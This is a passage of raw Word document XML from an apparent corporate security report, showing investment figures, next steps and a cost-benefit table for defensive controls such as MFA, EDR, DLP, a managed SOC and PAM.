          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EDR – £120K/year, detect malware/APTs [69]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>24/7 SOC – £180K/year, reduce dwell time [59]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Investment vs. Risk:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Year 1: £650K; ongoing: £340K/year; ROI: 77:1–384:1 [81]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00387B68" w:rsidRPr="00387B68" w:rsidRDefault="00387B68" w:rsidP="00387B68">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Next Steps:</w:t>
      </w:r>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Board approval, MFA deployment, monthly audit reports, follow-up red team in 12 months.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00387B68" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00387B68">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="5B9BD5" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>3.8 Cost-Benefit Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993BFF" w:rsidRPr="00C57BFC" w:rsidRDefault="00993BFF" w:rsidP="00993BFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C57BFC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Investment Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="1870"/>
      </w:tblGrid>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Security Control </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Implementation Cost </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Annual Licensing </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Total Year 1 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Mitigation </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>MFA (FIDO2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£50,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£15,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£65,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="009436F9">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Prevents 99.9% credential attacks </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[62]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>EDR (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>CrowdStrike</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£30,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£120,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£150,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Detects malware, ransomware, APTs </w:t>
            </w:r>
            <w:r w:rsidR="00807452" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[69]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>DLP (Microsoft Purview)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£80,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£40,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£120,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Prevents data exfiltration </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[60]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>24/7 SOC (Managed)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£20,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£180,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£200,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Reduces dwell time from 13 days to &lt;1 day </w:t>
            </w:r>
            <w:r w:rsidR="00372D62" w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[59]</w:t>
            </w:r>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidTr="009436F9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>PAM (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>CyberArk</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C57BFC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
              </w:rPr>
              <w:t>£100,000</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1870" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="009436F9" w:rsidRPr="00C57BFC" w:rsidRDefault="009436F9" w:rsidP="00993BFF">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
